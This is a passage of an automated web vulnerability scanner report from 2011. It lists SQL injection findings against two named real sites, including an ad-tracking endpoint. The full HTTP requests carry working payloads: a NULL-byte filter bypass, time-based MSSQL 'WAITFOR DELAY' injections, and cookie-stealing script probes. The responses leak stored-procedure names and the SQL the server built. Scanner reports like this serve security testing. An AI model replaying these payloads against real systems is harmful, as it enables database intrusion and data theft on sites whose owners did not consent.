Date: Fri, 18 Mar 2011 15:44:26 GMT
X-Varnish: 842362296
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: Coyote-2-ac9068e=ac906e9:0; path=/

//logged by Abacus

1.30. http://thethrottle.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://thethrottle.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /?a53db%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb17cf9c91cc=1 HTTP/1.1
Host: thethrottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:57:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thethrottle.com/xmlrpc.php
Link: <http://wp.me/VeJh>; rel=shortlink
Content-Length: 115332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
   <head profile
...[SNIP]...
<a href="http://thethrottle.com/2010/09/28/if-youre-going-to-fail-fail-all-the-way-video/">
...[SNIP]...

Request 2

GET /?a53db%22%3E%3Cscript%3Ealert(1)%3C/script%3Eb17cf9c91cc=1 HTTP/1.1
Host: thethrottle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Mar 2011 15:57:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://thethrottle.com/xmlrpc.php
Link: <http://wp.me/VeJh>; rel=shortlink
Content-Length: 115726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
   <head profile
...[SNIP]...

1.31. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725
Referer: http://www.google.com/search?hl=en&q='

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:34:31 GMT
Expires: Fri, 25 Mar 2011 16:34:06 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCABADAA=CPIKIJBCPNPHGPCNGDNOHABO; path=/
X-Powered-By: ASP.NET
Content-Length: 885
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.32. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:32:41 GMT
Expires: Fri, 25 Mar 2011 16:32:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSABBBCDC=CENICLBCPFEOEFKODNPHPFGF; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.33. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The VINDICOAUDIENCEISSUEDIDENTITY cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the VINDICOAUDIENCEISSUEDIDENTITY cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39'; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:28:23 GMT
Expires: Fri, 25 Mar 2011 16:27:58 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQSTDSCC=LLGBOPBCABLANADHCGKMELKI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.34. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [__qca cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __qca cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725'

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:30:07 GMT
Expires: Fri, 25 Mar 2011 16:29:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQAABCCA=COBACMBCNLHPKCJFGDBOCHFG; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.35. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The adRotationId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adRotationId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121'&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:24:50 GMT
Expires: Fri, 25 Mar 2011 16:24:26 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQTQSQTT=KOALOEBCAKIMOAPDFMMIOOAL; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.36. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the bannerCreativeAdModuleId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152'&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:26:34 GMT
Expires: Fri, 25 Mar 2011 16:26:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCADCBCAA=KMIHKHBCLPOJAPCAHAHDAIED; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.37. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The bannerCreativeAdModuleId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the bannerCreativeAdModuleId parameter. The application took 20093 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152waitfor%20delay'0%3a0%3a20'--&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:59:00 GMT
Expires: Fri, 18 Mar 2011 15:58:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCQATTSTR=CCLMNEEBAEKHIJIGGDPLOLAC; path=/
X-Powered-By: ASP.NET
Content-Length: 774
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860, @b
...[SNIP]...

1.38. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the campaignId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330'&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:23:07 GMT
Expires: Fri, 25 Mar 2011 16:22:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQCBBDDCD=OCNMCLBCKPJNDLDPPIBMOOKM; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.39. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The campaignId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the campaignId parameter. The application took 20067 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860&syndicationOutletId=47146&campaignId=6330waitfor%20delay'0%3a0%3a20'--&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:57:34 GMT
Expires: Fri, 18 Mar 2011 15:57:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAATTQTQ=IJAHJCEBGMCFAOCMAGPOILMG; path=/
X-Powered-By: ASP.NET
Content-Length: 776
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@adRotationId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860,
...[SNIP]...

1.40. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917&1'=1 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:31:01 GMT
Expires: Fri, 25 Mar 2011 16:30:37 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQSCARTC=LIIOKAACBNDPIBICCFGDDFMI; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.41. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [redirect parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The redirect parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the redirect parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917' HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:27:27 GMT
Expires: Fri, 25 Mar 2011 16:27:03 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCACADBCA=AEBEOHBCDAJFMNEPBGODKFIN; path=/
X-Powered-By: ASP.NET
Content-Length: 793
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.42. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the siteId parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Caveat: the siteId value here is the existing 1;WAITFOR DELAY '0:0:25'-- payload with the ' appended after the comment marker, so this instance adds nothing by itself; the error is produced by the WAITFOR payload regardless of the quote. The time-delay test in 1.43 is the confirming evidence for this parameter.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1;WAITFOR%20DELAY%20%270:0:25%27--'&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 25 Mar 2011 16:14:19 GMT
Expires: Fri, 25 Mar 2011 16:13:55 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQSCARTC=OADKKAACJJGBPNHMDAMLPJAC; path=/
X-Powered-By: ASP.NET
Content-Length: 794
Connection: keep-alive

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1;WAITFO
...[SNIP]...

1.43. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the siteId parameter. The application took 20131 milliseconds to respond to the request, compared with 0 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The response body shows the mechanism: the application echoes the command it built, SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860wait..., so the query-string value is concatenated into the text of a stored-procedure call rather than bound as a parameter. The waitfor delay executed (hence the 20 s), and the trailing -- commented out the remaining parameters, which is why SQL Server then reported @campaignId as not supplied. The adRotationId value in this request still carries a leftover cross-site scripting probe from the same scan; it plays no part in this finding. To exclude a coincidentally slow response, repeat the request with two or three different delay values and check that the response time tracks them.

The database appears to be Microsoft SQL Server.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1860waitfor%20delay'0%3a0%3a20'--&syndicationOutletId=47146&campaignId=6330&adRotationId=1512135c2d%3Cscript%3Ealert(document.cookie)%3C/script%3Ea400b254f48&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Fri, 18 Mar 2011 15:54:38 GMT
Expires: Fri, 18 Mar 2011 15:54:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSSCSRQRT=OLCIBHEBHAINHMLGMONBABNF; path=/
X-Powered-By: ASP.NET
Content-Length: 774
Connection: Close

<br>Error Description:Procedure or function 'Track_BannerCreativeImpression_V.1' expects parameter '@campaignId', which was not supplied.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1860wait
...[SNIP]...

1.44. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

